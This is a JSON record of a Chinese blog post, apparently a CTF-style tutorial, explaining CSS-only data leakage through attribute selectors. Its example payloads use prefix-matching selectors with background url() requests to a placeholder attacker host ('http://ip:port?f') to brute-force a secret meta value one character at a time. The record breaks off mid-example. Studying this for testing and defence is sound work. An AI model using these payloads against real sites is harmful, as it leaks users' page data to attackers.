{"id":322,"date":"2025-11-10T12:02:17","date_gmt":"2025-11-10T12:02:17","guid":{"rendered":"http:\/\/101.42.175.115\/wordpress\/?p=322"},"modified":"2026-01-07T12:12:42","modified_gmt":"2026-01-07T12:12:42","slug":"css_leak","status":"publish","type":"post","link":"http:\/\/101.42.175.115\/wordpress\/?p=322","title":{"rendered":"CSS_Leak"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u5148\u660e\u786e\u4e00\u4e0b\u8fd9\u4e2a\u6f0f\u6d1e\u80fd\u5b9e\u73b0\u7684\u6548\u679c \u2014\u2014 \u6cc4\u9732\u9875\u9762\u91cc\u53ef\u88ab CSS \u5c5e\u6027\u9009\u62e9\u5668\u8bbf\u95ee\u7684 HTML \u5c5e\u6027\u5185\u5bb9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u653b\u51fb\u624b\u6cd5\u633a\u50cf xss \u7684\uff0c\u4e0d\u8fc7\u6ca1\u6d89\u53ca\u5230 JavaScript\uff0c\u4ec5\u4ec5\u662f\u501f\u52a9 CSS \u548c HTML \u5c31\u5b9e\u73b0\u4e86\u4fe1\u606f\u6cc4\u9732\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">CSS\u5c5e\u6027\u9009\u62e9\u5668<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">CSS \u5c5e\u6027\u9009\u62e9\u5668\u662f CSS \u4e2d\u7684\u4e00\u79cd\u9009\u62e9\u5668\u7c7b\u578b\uff0c\u7528\u4e8e\u9009\u4e2d HTML \u5143\u7d20\u4e2d\u7b26\u5408\u7279\u5b9a\u5c5e\u6027\u6761\u4ef6\u7684\u5143\u7d20\u3002\u5c5e\u6027\u9009\u62e9\u5668\u5141\u8bb8\u57fa\u4e8e\u5143\u7d20\u7684\u5c5e\u6027\u540d\u3001\u5c5e\u6027\u503c\u6765\u5e94\u7528\u6837\u5f0f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>CSS <\/strong>\u5c5e\u6027\u9009\u62e9\u5668\u53ef\u4ee5\u4f7f\u7528\u6a21\u7cca\u5339\u914d\u8bed\u6cd5\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong><code>^=<\/code><\/strong>\uff1a\u5339\u914d\u5c5e\u6027\u503c\u4ee5\u67d0\u4e2a\u7279\u5b9a\u5b57\u7b26\u4e32\u5f00\u5934<\/li>\n\n\n\n<li><strong><code>$=<\/code><\/strong>\uff1a\u5339\u914d\u5c5e\u6027\u503c\u4ee5\u67d0\u4e2a\u7279\u5b9a\u5b57\u7b26\u4e32\u7ed3\u5c3e<\/li>\n\n\n\n<li><strong><code>*=<\/code><\/strong>\uff1a\u5339\u914d\u5c5e\u6027\u503c\u5305\u542b\u67d0\u4e2a\u7279\u5b9a\u5b57\u7b26\u4e32<\/li>\n\n\n\n<li><strong><code>|=<\/code><\/strong>\uff1a\u5339\u914d\u5c5e\u6027\u503c\u4ee5\u67d0\u4e2a\u7279\u5b9a\u5b57\u7b26\u4e32\u5f00\u59cb\uff0c\u5e76\u4e14\u540e\u9762\u53ef\u4ee5\u8ddf\u4e00\u4e2a\u8fde\u5b57\u7b26\uff08-\uff09<\/li>\n<\/ol>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u6765\u770b\u4e00\u4e2a\u4f8b\u5b50\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">HTML<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;!DOCTYPE html>\n&lt;head>\n \u00a0  &lt;style>\n \u00a0 \u00a0 \u00a0  div&#91;data-info=\"123\"&#93; {\n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  color: red;\n \u00a0 \u00a0 \u00a0  }\n \u00a0  &lt;\/style>\n&lt;\/head>\n&lt;body>\n&lt;div class=\"box\" id=\"item1\" data-info=\"123\">Content 1&lt;\/div>\n&lt;div class=\"box\" id=\"item2\" data-info=\"456\">Content 2&lt;\/div>\n&lt;\/body>\n&lt;\/html><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #999999\">&lt;!<\/span><span style=\"color: #1E754F\">DOCTYPE<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">html<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #1E754F\">div<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B07D48\">data-info<\/span><span style=\"color: #AB5959\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">123<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">&#93;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #998418\">color<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #A65E2B\">red<\/span><span style=\"color: #999999\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;\/<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;\/<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;<\/span><span style=\"color: #1E754F\">div<\/span><span style=\"color: #393A34\"> class=&quot;box&quot; id=&quot;item1&quot; <\/span><span style=\"color: #1E754F\">data-info<\/span><span style=\"color: #393A34\">=&quot;123&quot;<\/span><span style=\"color: #AB5959\">&gt;<\/span><span style=\"color: #1E754F\">Content<\/span><span style=\"color: #393A34\"> 1&lt;\/<\/span><span style=\"color: #1E754F\">div<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;<\/span><span style=\"color: #1E754F\">div<\/span><span style=\"color: #393A34\"> class=&quot;box&quot; id=&quot;item2&quot; <\/span><span style=\"color: #1E754F\">data-info<\/span><span style=\"color: #393A34\">=&quot;456&quot;<\/span><span style=\"color: #AB5959\">&gt;<\/span><span style=\"color: #1E754F\">Content<\/span><span style=\"color: #393A34\"> 2&lt;\/<\/span><span style=\"color: #1E754F\">div<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;\/<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;\/<\/span><span style=\"color: #1E754F\">html<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">HTML<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd0\u884c\u6548\u679c\u662f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"290\" height=\"202\" src=\"http:\/\/101.42.175.115\/wordpress\/wp-content\/uploads\/2025\/11\/1767787959-image-20251110193015191.png\" alt=\"\" class=\"wp-image-511\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u57fa\u7840\u77e5\u8bc6\u5176\u5b9e\u5c31\u8fd9\u8fd9\u4e9b\uff0c\u63a5\u4e0b\u6765\u90fd\u662f\u5229\u7528\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">CSS_Leak\u7684\u5b9e\u73b0<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u77e5\u9053 CSS \u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6e\u80cc\u666f\u56fe\u7247\u95f4\u63a5\u5b9e\u73b0\u53d1\u9001\u7f51\u7edc\u8bf7\u6c42\uff0c\u8fd9\u5c31\u4e3a\u4fe1\u606f\u6cc4\u9732\u63d0\u4f9b\u4e86\u51fa\u53e3\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3e\u4e2a\u4f8b\u5b50\uff0c\u73b0\u5728\u6709\u8fd9\u4e48\u4e00\u4e2a\u7f51\u9875\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">HTML<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;html>\n \u00a0  &lt;head> \n \u00a0 \u00a0 \u00a0  &lt;title>View&lt;\/title>\n \u00a0 \u00a0 \u00a0  &lt;meta name=\"secret\" content=\"flag\">\n \u00a0 \u00a0 \u00a0  &lt;style>\n \u00a0 \u00a0 \u00a0  meta{ choose } { \n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  background: { url };\n \u00a0 \u00a0 \u00a0  }\n \u00a0      &lt;\/style>\n \u00a0  &lt;\/head>\n \u00a0  &lt;body>\n \u00a0 \u00a0 \u00a0  &lt;h1>Hello!&lt;\/h1>\n \u00a0  &lt;\/body>\n&lt;\/html><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">html<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">title<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\">View<\/span><span style=\"color: #999999\">&lt;\/<\/span><span style=\"color: #1E754F\">title<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">meta<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">name<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">secret<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">content<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flag<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #1E754F\">meta<\/span><span style=\"color: #999999\">{<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #998418\">choose<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">{<\/span><span style=\"color: #393A34\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #998418\">background<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> { url <\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #393A34\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0      &lt;\/<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;\/<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  &lt;<\/span><span style=\"color: #1E754F\">h1<\/span><span style=\"color: #AB5959\">&gt;<\/span><span style=\"color: #393A34\">Hello!&lt;\/<\/span><span style=\"color: #1E754F\">h1<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;\/<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;\/<\/span><span style=\"color: #1E754F\">html<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">HTML<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u8fd9\u91cc\u7684 choose \u548c url \u662f\u53ef\u63a7\u6587\u672c\uff0c\u5c31\u80fd\u5b9e\u73b0 meta \u5143\u7d20\u4e2d\u7684\u5143\u7d20\u5185\u5bb9\u8bfb\u53d6\uff08\u4f8b\u5982 content \u7684\u503c flag\uff09\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b9e\u73b0\u8fc7\u7a0b\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u4e3a CSS \u5c5e\u6027\u9009\u62e9\u5668\u652f\u6301\u6a21\u7cca\u5339\u914d\u8bed\u6cd5\uff0c\u63d0\u4f9b\u4e86\u957f\u5b57\u7b26\u4e32\u7206\u7834\u7684\u53ef\u80fd\u6027\u3002\u6211\u4eec\u4ece\u83b7\u53d6\u7b2c\u4e00\u4e2a\u5b57\u7b26\u5f00\u59cb\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">HTML<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;html>\n \u00a0  &lt;head> \n \u00a0 \u00a0 \u00a0  &lt;title>View&lt;\/title>\n \u00a0 \u00a0 \u00a0  &lt;meta name=\"secret\" content=\"flag\">\n \u00a0 \u00a0 \u00a0  &lt;style>\n \u00a0 \u00a0 \u00a0  meta{&#91;name=\"secret\"&#93;&#91;content^=\"f\"&#93;} {\n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  background: url(\"http:\/\/ip:port?f\");\n \u00a0 \u00a0 \u00a0  }\n \u00a0      &lt;\/style>\n \u00a0  &lt;\/head>\n \u00a0  &lt;body>\n \u00a0 \u00a0 \u00a0  &lt;h1>Hello!&lt;\/h1>\n \u00a0  &lt;\/body>\n&lt;\/html><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">html<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">title<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\">View<\/span><span style=\"color: #999999\">&lt;\/<\/span><span style=\"color: #1E754F\">title<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">meta<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">name<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">secret<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">content<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flag<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #1E754F\">meta<\/span><span style=\"color: #999999\">{<\/span><span style=\"color: #393A34\">&#91;<\/span><span style=\"color: #998418\">name<\/span><span style=\"color: #393A34\">=&quot;<\/span><span style=\"color: #998418\">secret<\/span><span style=\"color: #393A34\">&quot;&#93;&#91;<\/span><span style=\"color: #998418\">content<\/span><span style=\"color: #393A34\">^=&quot;<\/span><span style=\"color: #998418\">f<\/span><span style=\"color: #393A34\">&quot;&#93;<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #998418\">background<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #998418\">url<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">http:\/\/ip:port?f<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0      &lt;\/<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;\/<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  &lt;<\/span><span style=\"color: #1E754F\">h1<\/span><span style=\"color: #AB5959\">&gt;<\/span><span style=\"color: #393A34\">Hello!&lt;\/<\/span><span style=\"color: #1E754F\">h1<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;\/<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;\/<\/span><span style=\"color: #1E754F\">html<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">HTML<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c content \u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f f\uff0c\u5c31\u80fd\u89e6\u53d1 CSS \u5c5e\u6027\u9009\u62e9\u5668\u4e2d\u7684\u884c\u4e3a\uff0c\u5411 <a href=\"http:\/\/ip:port\/?a\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/ip:port?a<\/a>\uff08\u653b\u51fb\u673a\uff09\u53d1\u9001\u8bf7\u6c42\u3002\u6211\u4eec\u53ef\u4ee5\u4fdd\u6301 url \u4e2d\u7684 get \u53c2\u6570\u540d\u548c\u5df2\u7ecf\u7206\u7834\u51fa\u7684\u5f85\u6cc4\u9732\u5b57\u7b26\u4e32\u4fdd\u6301\u4e00\u81f4\uff0c\u5c31\u80fd\u901a\u8fc7\u653b\u51fb\u673a\u4e0a\u7684\u8bf7\u6c42\u4fe1\u606f\u83b7\u53d6\u6cc4\u9732\u4fe1\u606f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u540e\u7eed\u8fd8\u662f\u4e00\u6837\u7684\u601d\u8def\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">HTML<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>&lt;html>\n \u00a0  &lt;head> \n \u00a0 \u00a0 \u00a0  &lt;title>View&lt;\/title>\n \u00a0 \u00a0 \u00a0  &lt;meta name=\"secret\" content=\"flag\">\n \u00a0 \u00a0 \u00a0  &lt;style>\n \u00a0 \u00a0 \u00a0  meta{&#91;name=\"secret\"&#93;&#91;content^=\"fl\"&#93;} {\n \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  background: url(\"http:\/\/ip:port?fl\");\n \u00a0 \u00a0 \u00a0  }\n \u00a0      &lt;\/style>\n \u00a0  &lt;\/head>\n \u00a0  &lt;body>\n \u00a0 \u00a0 \u00a0  &lt;h1>Hello!&lt;\/h1>\n \u00a0  &lt;\/body>\n&lt;\/html><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">html<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">title<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\">View<\/span><span style=\"color: #999999\">&lt;\/<\/span><span style=\"color: 